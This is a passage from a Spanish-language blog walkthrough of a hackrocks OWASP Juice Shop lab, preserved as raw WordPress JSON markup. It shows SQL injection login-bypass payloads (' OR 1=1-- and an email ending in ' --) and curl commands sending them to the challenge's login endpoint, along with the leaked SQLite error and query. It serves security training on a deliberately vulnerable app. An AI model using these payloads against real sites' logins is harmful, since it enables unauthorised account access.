Y en el campo de email agregamos<\/li>\n<\/ul>\n\n\n\n' OR 1=1--<\/code><\/pre>\n\n\n\n\nnos permite ingresar<\/li>\n<\/ul>\n\n\n\n\nejecutamos esto nos devuelve un 200 de resultado ok<\/li>\n<\/ul>\n\n\n\ncurl -s -o \/dev\/null -w \"%{http_code}\" \\\n -X POST https:\/\/challenges.hackrocks.com\/owasp\/rest\/user\/login \\\n -H \"Content-Type: application\/json\" \\\n -d '{\"email\":\"'\\'' OR 1=1--\",\"password\":\"test\"}'<\/code><\/pre>\n\n\n\n\npero si queremos ver el CODIGO DE ERROR como en la pregunta debemos poner una comilla en el campo de email y cualquier cosa en password<\/li>\n<\/ul>\n\n\n\n\nY en las herramientas de de desarrollo vemos un error 500, si tocamos en respuesta vemos SQLITE_ERROR y esta es la respuesta<\/li>\n<\/ul>\n\n\n\nLogin Bypass<\/h3>\n\n\n\n Como hemos podido ver, acompa\u00f1ado del c\u00f3digo de error tenemos la consulta que se ejecuta en el login.<\/p>\n\n\n\n
Tu misi\u00f3n consiste en hacer el Login Bypass usando la informaci\u00f3n. <\/p>\n\n\n\n
\nprimero esta es la respuesta completa del paso anterior<\/li>\n<\/ul>\n\n\n\nerror\t{ message: 'SQLITE_ERROR: unrecognized token: \"2510c39011c5be704182423e3a695e91\"', stack: \"Error\\n at Database.<anonymous> (\/juice-shop\/node_modules\/sequelize\/lib\/dialects\/sqlite\/query.js:185:27)\\n at \/juice-shop\/node_modules\/sequelize\/lib\/dialects\/sqlite\/query.js:183:50\\n at new Promise (<anonymous>)\\n at Query.run (\/juice-shop\/node_modules\/sequelize\/lib\/dialects\/sqlite\/query.js:183:12)\\n at \/juice-shop\/node_modules\/sequelize\/lib\/sequelize.js:315:28\\n at process.processTicksAndRejections (node:internal\/process\/task_queues:104:5)\", name: \"SequelizeDatabaseError\", \u2026 }\nmessage\t'SQLITE_ERROR: unrecognized token: \"2510c39011c5be704182423e3a695e91\"'\nstack\t\"Error\\n at Database.<anonymous> (\/juice-shop\/node_modules\/sequelize\/lib\/dialects\/sqlite\/query.js:185:27)\\n at \/juice-shop\/node_modules\/sequelize\/lib\/dialects\/sqlite\/query.js:183:50\\n at new Promise (<anonymous>)\\n at Query.run (\/juice-shop\/node_modules\/sequelize\/lib\/dialects\/sqlite\/query.js:183:12)\\n at \/juice-shop\/node_modules\/sequelize\/lib\/sequelize.js:315:28\\n at process.processTicksAndRejections (node:internal\/process\/task_queues:104:5)\"\nname\t\"SequelizeDatabaseError\"\nparent\t{ errno: 1, code: \"SQLITE_ERROR\", sql: \"SELECT * FROM Users WHERE email = ''' AND password = '2510c39011c5be704182423e3a695e91' AND deletedAt IS NULL\" }\noriginal\t{ errno: 1, code: \"SQLITE_ERROR\", sql: \"SELECT * FROM Users WHERE email = ''' AND password = '2510c39011c5be704182423e3a695e91' AND deletedAt IS NULL\" }\nsql\t\"SELECT * FROM Users WHERE email = ''' AND password = '2510c39011c5be704182423e3a695e91' AND deletedAt IS NULL\"\nparameters\t{}<\/code><\/pre>\n\n\n\n\nahora con base a la respuesta debemos crear una consulta asi<\/li>\n\n\n\n original<\/li>\n<\/ul>\n\n\n\nSELECT * FROM Users WHERE email = ''' AND password = '2510c39011c5be704182423e3a695e91' AND deletedAt IS NULL<\/code><\/pre>\n\n\n\n\nAhora si le agregamos<\/li>\n<\/ul>\n\n\n\n' OR 1=1--<\/code><\/pre>\n\n\n\n\nquedaria asi<\/li>\n<\/ul>\n\n\n\nSELECT * FROM Users WHERE email = '' OR 1=1--' AND password = '2510c39011c5be704182423e3a695e91' AND deletedAt IS NULL<\/code><\/pre>\n\n\n\n\nAsi seria el select que se jecuta<\/li>\n<\/ul>\n\n\n\nSELECT * FROM Users WHERE email = '' OR 1=1<\/code><\/pre>\n\n\n\n\ny esto comenta el resto<\/li>\n<\/ul>\n\n\n\n--' AND password = '2510c39011c5be704182423e3a695e91' AND deletedAt IS NULL<\/code><\/pre>\n\n\n\n\npo rtanto si hacemos <\/li>\n<\/ul>\n\n\n\ncurl -s \\\n -X POST https:\/\/challenges.hackrocks.com\/owasp\/rest\/user\/login \\\n -H \"Content-Type: application\/json\" \\\n -d '{\"email\":\"'\\'' OR 1=1--\",\"password\":\"test\"}' | python3 -m json.tool\n<\/code><\/pre>\n\n\n\n\nnos retorna los usuarios<\/li>\n<\/ul>\n\n\n\nAccediendo a bender<\/h3>\n\n\n\n Teniendo en cuenta la t\u00e9cnica utilizada anteriormente, prueba a iniciar sesi\u00f3n en la cuenta de bender<\/em>, cuya informaci\u00f3n la tienes en el panel de administraci\u00f3n. Tendr\u00e1s que echarle imaginaci\u00f3n para saltarte la contrase\u00f1a, pero ahora el email es v\u00e1lido.<\/p>\n\n\n\nPregunta<\/strong><\/p>\n\n\n\n\u00bfQu\u00e9 introduces en el campo de email para poder acceder?<\/strong><\/p>\n\n\n\nbender@juice-sh.op' --<\/code><\/pre>\n\n\n\n\nlogramos ingresar<\/li>\n<\/ul>\n\n\n\nTesting XSS<\/h3>\n\n\n\n Tras los pasos previos realizados, ya puedes visitar el panel de administraci\u00f3n y ver todos los usuarios registrados as\u00ed como las rese\u00f1as.<\/p>\n\n\n\n
Si visitas el score-board puedes ver que hay informaci\u00f3n extra sobre algunos retos. Realiza alg\u00fan XSS y responde a la pregunta.<\/p>\n\n\n\nProbando rese\u00f1as<\/h3>\n\n\n\n Te gusta probar cosas as\u00ed que decides dar una rese\u00f1a de 0 estrellas e intentar obtener informaci\u00f3n relevante.<\/p>\n\n\n\nResumen Explora diferentes vulnerabilidades que nos podemos encontrar en una aplicaci\u00f3n web insegura. Para ello contamos con una \u201cTienda Online\u201d desplegada a la que tendr\u00e1s que atacar. Utiliza herramientas de enumeraci\u00f3n de directorios, herramientas del desarrollador del navegador, conocimientos t\u00e9cnicos y creatividad sobre todo. \u00a1Empezamos! Empezando La web vulnerable a testear se encuentra en el […]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-23459","post","type-post","status-publish","format-standard","hentry","category-sin-categoria"],"blocksy_meta":[],"_links":{"self":[{"href":"https:\/\/sada.services\/index.php?rest_route=\/wp\/v2\/posts\/23459","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sada.services\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sada.services\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sada.services\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/sada.services\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23459"}],"version-history":[{"count":6,"href":"https:\/\/sada.services\/index.php?rest_route=\/wp\/v2\/posts\/23459\/revisions"}],"predecessor-version":[{"id":23496,"href":"https:\/\/sada.services\/index.php?rest_route=\/wp\/v2\/posts\/23459\/revisions\/23496"}],"wp:attachment":[{"href":"https:\/\/sada.services\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23459"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sada.services\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23459"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sada.services\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23459"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"\"](\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-110-1024x513.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-111.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-113.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-114.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-112-1024x414.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-115.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-116.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-117.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-118-1024x336.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-119-1024x310.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-120-1024x190.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-121.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-122-1024x516.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-124.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-125-1024x702.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-126-1024x358.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-127-1024x272.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-128-1024x215.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-129-1024x369.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-130.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-131-1024x532.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-132.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-133-1024x511.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-134-1024x309.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-135-1024x263.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-136-1024x254.png\")
<\/figure>\n","protected":false},"excerpt":{"rendered":"